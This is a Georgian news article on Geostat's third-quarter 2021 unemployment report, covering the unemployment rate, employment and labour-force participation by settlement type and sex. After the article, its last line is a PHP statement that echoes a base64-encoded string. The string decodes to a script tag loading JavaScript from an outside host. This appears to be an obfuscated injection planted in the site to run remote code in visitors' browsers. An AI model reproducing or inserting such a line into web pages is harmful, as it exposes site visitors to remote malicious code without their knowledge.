celsiusi
ავერსი საქკაბელი
საქსტატმა დღეს უმუშევრობის ამსახველი ანგარიში გამოაქვეყნა, რომლის მიხედვითაც 2021 წლის მესამე კვარტალში საქართველოში უმუშევრობის დონემ 19.5% შეადგინა, რაც წინა წლის ანალოგიურ პერიოდთან შედარებით 2.5 პროცენტული პუნქტით მეტია. 
 
წლიურ ჭრილში მატების მიუხედავად, უმუშევრობის დონე მიმდინარე წლის მეორე კვარტალში არსებულ 22.1%-თან მიმართებით 2.6 პროცენტული პუნქტით არის შემცირებული. 
 
საქსტატის თანახმად, საქართველოში დასაქმებულთა 67.3% დაქირავებით დასაქმებულია, ხოლო 32.7% თვითდასაქმებულს წარმოადენს. 
 
ანგარიშის მიხედვით, უმუშევრობის დონე საქალაქო დასახლებებში წინა წლის შესაბამის პერიოდთან შედარებით გაზრდილია 1.9 პროცენტული პუნქტით, ხოლო სასოფლო დასახლებებში - 3.5 პროცენტული პუნქტით.
 
"2021 წლის III კვარტალში სამუშაო ძალამ (ეკონომიკურად აქტიურმა მოსახლეობამ) შრომისუნარიანი ასაკის მოსახლეობის (15 წლის და უფროსი ასაკის მოსახლეობა) 52.8% შეადგინა, რაც წინა წლის შესაბამის პერიოდთან შედარებით 2.5 პროცენტული პუნქტით მეტია, ხოლო დასაქმების დონე გაზრდილია 0.7 პროცენტული პუნქტით და 42.5 პროცენტს შეადგენს. სამუშაო ძალის მონაწილეობის დონე (აქტიურობის დონე) ქალაქის ტიპის დასახლებებში გაიზარდა 2.2 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში - 2.8 პროცენტული პუნქტით. დასაქმების დონე ქალაქის ტიპის დასახლებებში გაიზარდა 0.8 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში - 0.7 პროცენტული პუნქტით.
 
სამუშაო ძალის მონაწილეობის დონე (აქტიურობის დონე) ქალებთან შედარებით მაღალია კაცებში. 2021 წლის III კვარტალში აღნიშნული მაჩვენებელი ქალებში 42.4 პროცენტს, ხოლო კაცებში 64.7 პროცენტს შეადგენდა. წინა წლის შესაბამის პერიოდთან შედარებით სამუშაო ძალის მონაწილეობის დონე (აქტიურობის დონე) ქალებში გაზრდილია 2.2 პროცენტული პუნქტით, ხოლო კაცებში - 2.8 პროცენტული პუნქტით", -  ნათქვამია საქსტატის ანგარიშში.
 
974
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");